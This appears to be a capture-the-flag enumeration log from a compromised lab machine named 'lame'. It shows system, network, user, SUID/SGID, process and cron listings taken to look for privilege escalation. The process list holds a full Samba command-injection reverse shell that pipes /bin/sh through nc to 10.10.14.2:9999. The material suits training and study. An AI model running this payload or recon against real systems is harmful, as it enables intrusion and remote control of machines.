System/Kernel
daemon@lame:/tmp$ file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.8, dynamically linked (uses shared libs), stripped
linux lame 2.6.24-16-server #1 smp thu apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"Ubuntu 8.04
2.6.24-16-server
i686
Networks
daemon@lame:/tmp$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:48516 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:34091 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:58861 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:51824 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.3:45106 10.10.14.2:9999 ESTABLISHED -
tcp 0 17 10.10.10.3:47188 10.10.14.2:443 ESTABLISHED 6273/bash
tcp 1 0 10.10.10.3:445 10.10.14.2:56310 CLOSE_WAIT -
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 10.10.10.3:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.10.3:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:54922 0.0.0.0:* -
udp 0 0 127.0.0.1:161 0.0.0.0:* -
udp 0 0 0.0.0.0:33323 0.0.0.0:* -
udp 0 0 0.0.0.0:36654 0.0.0.0:* -
udp 0 0 10.10.10.3:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:69 0.0.0.0:* -
udp 0 0 127.0.0.1:47965 127.0.0.1:47965 ESTABLISHED -
udp 0 0 0.0.0.0:992 0.0.0.0:* -
udp 0 0 0.0.0.0:46434 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 127.0.0.1:56184 0.0.0.0:* - So many active sockets
Users & Groups
daemon@lame:/tmp$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
makis:x:1003:1003::/home/makis:/bin/sh
total 24K
4.0K drwxr-xr-x 21 root root 4.0K Oct 31 2020 ..
4.0K drwxr-xr-x 2 makis makis 4.0K Mar 14 2017 makis
4.0K drwxr-xr-x 6 root root 4.0K Mar 14 2017 .
4.0K drwxr-xr-x 3 1001 1001 4.0K May 7 2010 user
4.0K drwxr-xr-x 2 service service 4.0K Apr 16 2010 service
4.0K drwxr-xr-x 2 root nogroup 4.0K Mar 17 2010 ftpmakis
user
service
ftp
daemon@lame:/tmp$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(dhcp) gid=102(dhcp) groups=102(dhcp)
uid=102(syslog) gid=103(syslog) groups=103(syslog)
uid=103(klog) gid=104(klog) groups=104(klog)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(bind) gid=113(bind) groups=113(bind)
uid=106(postfix) gid=115(postfix) groups=115(postfix)
uid=107(ftp) gid=65534(nogroup) groups=65534(nogroup)
uid=108(postgres) gid=117(postgres) groups=117(postgres),114(ssl-cert)
uid=109(mysql) gid=118(mysql) groups=118(mysql)
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
uid=111(distccd) gid=65534(nogroup) groups=65534(nogroup)
uid=1002(service) gid=1002(service) groups=1002(service)
uid=112(telnetd) gid=120(telnetd) groups=120(telnetd),43(utmp)
uid=113(proftpd) gid=65534(nogroup) groups=65534(nogroup)
uid=114(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=115(snmp) gid=65534(nogroup) groups=65534(nogroup)
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)SUIDs
daemon@lame:/tmp$ find / -perm -04000 -ls -type f 2>/dev/null
16466 68 -rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount
16449 20 -rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
16398 28 -rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su
16418 84 -rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/mount
16427 32 -rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
16457 28 -rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
8370 68 -rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/mount.nfs
304747 4 -rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
344359 112 -rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudoedit
344440 8 -rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
344958 12 -rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-rsh
344139 40 -rwsr-xr-x 1 root root 37360 Apr 2 2008 /usr/bin/gpasswd
344317 16 -rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
344359 112 -rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudo
344959 12 -rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin
344230 12 -rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
344231 40 -rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
344365 20 -rwsr-xr-x 1 root root 19144 Apr 2 2008 /usr/bin/newgrp
344429 28 -rwsr-xr-x 1 root root 28624 Apr 2 2008 /usr/bin/chfn
344956 768 -rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
344441 24 -rwsr-xr-x 1 root root 23952 Apr 2 2008 /usr/bin/chsh
344957 16 -rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp
344771 32 -rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd
344792 48 -rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
354632 16 -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
354626 268 -rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
369987 8 -rwsr-xr-- 1 root telnetd 6040 Dec 17 2006 /usr/lib/telnetlogin
385106 12 -rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec
386116 8 -rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-get-device
377149 168 -rwsr-xr-x 1 root root 165748 Apr 6 2008 /usr/lib/openssh/ssh-keysign
371390 12 -rwsr-xr-x 1 root root 9624 Aug 17 2009 /usr/lib/pt_chown
8415 16 -r-sr-xr-x 1 root root 14320 Nov 3 2020 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
16687 12 -r-sr-xr-x 1 root root 9532 Nov 3 2020 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper/usr/bin/nmap
/usr/bin/mtr
SGIDs
daemon@lame:/tmp$ find / -perm -02000 -ls -type f 2>/dev/null
8252 20 -rwxr-sr-x 1 root shadow 19584 Apr 9 2008 /sbin/unix_chkpwd
354770 4 drwxrwsr-x 2 root src 4096 Apr 15 2008 /usr/src
345080 4 -rwxr-sr-x 1 root utmp 3192 Apr 22 2008 /usr/bin/Eterm
344440 8 -rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
344089 8 -rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write
344366 80 -rwxr-sr-x 1 root ssh 76580 Apr 6 2008 /usr/bin/ssh-agent
344689 32 -rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
344364 28 -rwxr-sr-x 1 root crontab 26928 Apr 8 2008 /usr/bin/crontab
344550 40 -rwxr-sr-x 1 root shadow 37904 Apr 2 2008 /usr/bin/chage
344284 308 -rwxr-sr-x 1 root utmp 308228 Oct 23 2007 /usr/bin/screen
344220 20 -rwxr-sr-x 1 root shadow 16424 Apr 2 2008 /usr/bin/expiry
344231 40 -rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
345067 304 -rwxr-sr-x 1 root utmp 306996 Jan 2 2009 /usr/bin/xterm
344337 12 -rwxr-sr-x 1 root tty 9960 Apr 14 2008 /usr/bin/wall
354632 16 -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
354594 12 -r-xr-sr-x 1 root postdrop 10312 Apr 18 2008 /usr/sbin/postqueue
354659 12 -r-xr-sr-x 1 root postdrop 10036 Apr 18 2008 /usr/sbin/postdrop
362714 4 drwxrwsr-x 2 root staff 4096 Mar 23 2010 /usr/local/share/fonts
362707 4 drwxrwsr-x 7 root staff 4096 Mar 23 2010 /usr/local/share/sgml
362708 4 drwxrwsr-x 2 root staff 4096 Mar 23 2010 /usr/local/share/sgml/stylesheet
362711 4 drwxrwsr-x 2 root staff 4096 Mar 23 2010 /usr/local/share/sgml/declaration
362712 4 drwxrwsr-x 2 root staff 4096 Mar 23 2010 /usr/local/share/sgml/dtd
362710 4 drwxrwsr-x 2 root staff 4096 Mar 23 2010 /usr/local/share/sgml/entities
362709 4 drwxrwsr-x 2 root staff 4096 Mar 23 2010 /usr/local/share/sgml/misc
362704 4 drwxrwsr-x 2 root staff 4096 Apr 17 2010 /usr/local/lib/site_ruby/1.8/i486-linux
362700 4 drwxrwsr-x 3 root staff 4096 Apr 28 2010 /usr/local/lib/python2.5
362701 4 drwxrwsr-x 2 root staff 4096 Apr 28 2010 /usr/local/lib/python2.5/site-packages
139540 4 drwxr-s--- 2 root dip 4096 Mar 16 2010 /etc/chatscripts
139850 4 drwxr-s--- 2 root dip 4096 Mar 16 2010 /etc/ppp/peers
140629 4 drwxr-sr-x 2 root bind 4096 Mar 17 2010 /etc/bind
13001 0 drwxrwsr-x 2 postgres postgres 100 apr 4 22:09 /var/run/postgresql
66129 4 drwxrwsr-x 2 root mail 4096 Mar 14 2017 /var/mail
66076 4 drwxr-s--- 2 mysql adm 4096 Mar 17 2010 /var/log/mysql
66117 4 drwxr-sr-x 2 news news 4096 Mar 16 2010 /var/log/news
66066 4 drwxrwsr-x 2 root staff 4096 Apr 15 2008 /var/local
50445 4 drwxrwsr-x 2 libuuid libuuid 4096 Mar 16 2010 /var/lib/libuuid
49194 4 drwx--s--- 2 postfix postdrop 4096 apr 4 22:09 /var/spool/postfix/publicProcesses
daemon@lame:/tmp$ ps -auxwww
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 2844 1696 ? Ss 22:09 0:01 /sbin/init
root 2742 0.0 0.1 2240 756 ? S<s 22:09 0:00 /sbin/udevd --daemon
root 4438 0.0 0.7 6508 3708 ? S 22:09 0:03 /usr/sbin/vmtoolsd
root 4469 0.0 1.4 13708 7676 ? S 22:09 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
statd 4632 0.0 0.1 1900 724 ? Ss 22:09 0:00 /sbin/rpc.statd
root 4653 0.0 0.1 3648 560 ? Ss 22:09 0:00 /usr/sbin/rpc.idmapd
root 4883 0.0 0.0 1716 488 tty4 Ss+ 22:09 0:00 /sbin/getty 38400 tty4
root 4884 0.0 0.0 1716 492 tty5 Ss+ 22:09 0:00 /sbin/getty 38400 tty5
root 4889 0.0 0.0 1716 492 tty2 Ss+ 22:09 0:00 /sbin/getty 38400 tty2
root 4891 0.0 0.0 1716 492 tty3 Ss+ 22:09 0:00 /sbin/getty 38400 tty3
root 4894 0.0 0.0 1716 492 tty6 Ss+ 22:09 0:00 /sbin/getty 38400 tty6
root 4985 0.0 0.1 1872 544 ? S 22:09 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog 4987 0.0 0.4 3284 2128 ? Ss 22:09 0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind 5012 0.0 1.4 35408 7680 ? Ssl 22:09 0:00 /usr/sbin/named -u bind
root 5036 0.0 0.1 5312 1028 ? Ss 22:09 0:00 /usr/sbin/sshd
root 5117 0.0 0.2 2768 1308 ? S 22:09 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 5159 0.0 3.3 127560 17028 ? Sl 22:09 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 5161 0.0 0.1 1700 556 ? S 22:09 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres 5240 0.0 0.9 41340 5076 ? S 22:09 0:00 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
root 5335 0.0 0.0 2424 336 ? Ss 22:09 0:00 /usr/sbin/rpc.mountd
root 5403 0.0 0.3 5412 1728 ? Ss 22:09 0:00 /usr/lib/postfix/master
postfix 5404 0.0 0.3 5420 1648 ? S 22:09 0:00 pickup -l -t fifo -u -c
postfix 5407 0.0 0.3 5460 1684 ? S 22:09 0:00 qmgr -l -t fifo -u
root 5411 0.0 0.2 5388 1192 ? Ss 22:09 0:00 /usr/sbin/nmbd -D
root 5413 0.0 0.2 7724 1488 ? Ss 22:09 0:00 /usr/sbin/smbd -D
root 5417 0.0 0.1 7724 816 ? S 22:09 0:00 /usr/sbin/smbd -D
snmp 5419 0.0 0.7 8488 3760 ? S 22:09 0:00 /usr/sbin/snmpd -Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1
root 5435 0.0 0.1 2424 864 ? Ss 22:09 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd 5501 0.0 0.3 9948 1600 ? Ss 22:10 0:00 proftpd: (accepting connections)
root 5530 0.0 0.1 2104 896 ? Ss 22:10 0:00 /usr/sbin/cron
root 5560 0.0 0.0 2052 348 ? Ss 22:10 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 5561 0.0 0.0 2052 476 ? S 22:10 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55 5563 0.3 17.8 365184 91808 ? Sl 22:10 0:16 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 5583 0.0 0.4 10596 2556 ? Ss 22:10 0:00 /usr/sbin/apache2 -k start
www-data 5584 0.0 0.3 10596 1948 ? S 22:10 0:00 /usr/sbin/apache2 -k start
www-data 5587 0.0 0.3 10596 1948 ? S 22:10 0:00 /usr/sbin/apache2 -k start
www-data 5590 0.0 0.3 10596 1948 ? S 22:10 0:00 /usr/sbin/apache2 -k start
www-data 5592 0.0 0.3 10596 1948 ? S 22:10 0:00 /usr/sbin/apache2 -k start
www-data 5594 0.0 0.3 10596 1948 ? S 22:10 0:00 /usr/sbin/apache2 -k start
root 5604 0.0 5.1 66344 26472 ? Sl 22:10 0:00 /usr/bin/rmiregistry
root 5608 0.1 0.4 12208 2540 ? Sl 22:10 0:05 ruby /usr/sbin/druby_timeserver.rb
root 5613 0.0 0.4 8540 2360 ? S 22:10 0:00 /usr/bin/unrealircd
root 5624 0.0 0.0 1716 492 tty1 Ss+ 22:10 0:00 /sbin/getty 38400 tty1
root 5627 0.0 2.3 13928 12008 ? S 22:10 0:00 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root 5631 0.0 0.2 2724 1184 ? S 22:10 0:00 /bin/sh /root/.vnc/xstartup
root 5634 0.0 0.4 5936 2564 ? S 22:10 0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 5637 0.0 0.9 8984 4988 ? S 22:10 0:01 fluxbox
root 5648 0.0 0.3 2852 1548 pts/0 Ss+ 22:10 0:00 -bash
root 6313 0.0 0.3 7932 1764 ? S 23:00 0:00 /usr/sbin/smbd -D
root 6314 0.0 0.2 2724 1184 ? S 23:00 0:00 sh -c /etc/samba/scripts/mapusers.sh "/=`nohup mkfifo /tmp/hago; nc 10.10.14.2 9999 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago`"
root 6317 0.0 0.1 1752 612 ? S 23:00 0:00 nc 10.10.14.2 9999
root 6318 0.0 0.2 2720 1176 ? S 23:00 0:00 /bin/sh/usr/sbin/cron
/usr/bin/unrealircd
root 5631 0.0 0.2 2724 1184 ? S 22:10 0:00 /bin/sh /root/.vnc/xstartup
Cron & Systemd
daemon@lame:/tmp$ crontab -l ; cat /etc/crontab
no crontab for daemon
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
path=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#Sudo Version
daemon@lame:/tmp$ sudo -V
Sudo version 1.6.9p10Sudo version 1.6.9p10
Glibc Version
daemon@lame:/tmp$ ldd --version
ldd (GNU libc) 2.7
Copyright (C) 2007 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (GNU libc) 2.7